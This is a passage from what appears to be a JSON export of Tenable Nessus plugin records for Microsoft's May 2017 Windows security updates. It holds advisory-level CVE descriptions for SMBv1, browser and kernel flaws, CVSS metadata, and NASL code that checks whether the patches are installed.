code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019215/windows-8-update-kb4019215\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?09cc032f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019213 or Cumulative update KB4019215.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019213', # 8.1 / 2012 R2 Security Only\n '4019215' # 8.1 / 2012 R2 Monthly Rollup\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Windows 8.1 / Windows Server 2012 R2\nif ( smb_check_rollup(os:\"6.3\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019213, 4019215]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:04", "description": "The remote Windows 10 version 1507 host is missing security update KB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019474.NASL", "href": "https://www.tenable.com/plugins/nessus/100061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100061);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019474\");\n script_xref(name:\"MSFT\", value:\"MS17-4019474\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1507 host is missing security update\nKB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019474/windows-10-update-kb4019474\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01ec841b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019474.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n 